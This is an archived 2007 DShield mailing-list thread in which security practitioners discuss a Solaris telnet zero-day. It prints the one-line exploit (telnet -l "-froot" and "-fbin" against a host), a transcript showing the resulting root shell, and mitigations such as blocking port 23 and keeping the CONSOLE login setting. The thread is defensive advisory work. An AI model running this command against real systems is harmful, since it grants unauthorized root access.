[Dshield] Solaris Telnet 0-day (Important!)

Scott Fendley scottf at uark.edu
Mon Feb 12 05:23:21 GMT 2007


HD is not 100% accurate.  It can be -froot   if and only if you have 
commented  the CONSOLE setting within /etc/default/login .  This 
setting prevents network logons to root account and is set by 
default.  However, I have seen some admins comment it out as they had 
been able to do logins to the root account in other unix or linux 
distributions.   Below is an excerpt for a test on a system that has 
that setting commented.

% telnet -l "-froot" 192.168.1.1
Trying 192.168.1.1...
Connected to somehost (192.168.1.1.).
Escape character is '^]'.
Last login: Sun Feb 11 15:08:17 from myhost
Sun Microsystems Inc.   SunOS 5.10      Generic January 2005
# id
uid=0(root) gid=0(root)


With the console setting in its default state you get the below

% telnet -l "-froot" 192.168.1.1
Trying 192.168.1.1...
Connected to somehost (192.168.1.1.).
Escape character is '^]'.
Not on system console
Connection closed by foreign host.

If you try userids with non standard shells  such as /bin/false or 
one similar to the one in the jass package will also kick the end 
user out.  Users that have been locked  (passwd -l userid ) will also 
be booted out with a "Login incorrect" message.

Hope this helps everyone understand how much risk they have.

Scott


At 10:53 PM 2/11/2007, Gadi Evron wrote:
> >From HD Moore:
>"but this bug isnt -froot, its -fanythingbutroot =P"
>
>On Sun, 11 Feb 2007, K K wrote:
>
> > On 2/11/07, Johannes B. Ullrich <jullrich at sans.org> wrote:
> > > If you run Solaris, please check if you got telnet enabled NOW. If you
> > > can, block port 23 at your perimeter. There is a fairly trivial Solaris
> > > telnet 0-day.
> > >
> > > telnet -l "-froot" [hostname]
> > >
> > > will give you root on many Solaris systems with default installs
> > > We are still testing. Please use our contact form at
> > > https://isc.sans.org/contact.html
> >
> > On systems where the above fails with "Not on system console", don't
> > assume that the machine is secure, because the following does work,
> > and is one step from root:
> >
> > telnet -l "-fbin" [hostname]
> >
> > Gadi Evron <ge at linuxbox.org>  wrote:
> > >. If Solaris 10 & 11 are truly vulnerable to this bug,
> > > Sun deserves a  *swift* kick to the head.
> >
> > The above is from my testing with Solaris 10, so get ready to 
> start kicking...
> >
> > Kevin
> > _________________________________________
> >
> > SANS 2007 March 29 - April 6 in San Diego, CA offers 52 Courses
> > taught by our top rated instructors plus a huge vendor tools expo.
> > Register Today! http://www.sans.org/info/2501 (BROCHURECODE: ISC)
> >
>
>_________________________________________
>
>SANS 2007 March 29 - April 6 in San Diego, CA offers 52 Courses
>taught by our top rated instructors plus a huge vendor tools expo.
>Register Today! http://www.sans.org/info/2501 (BROCHURECODE: ISC)



More information about the list mailing list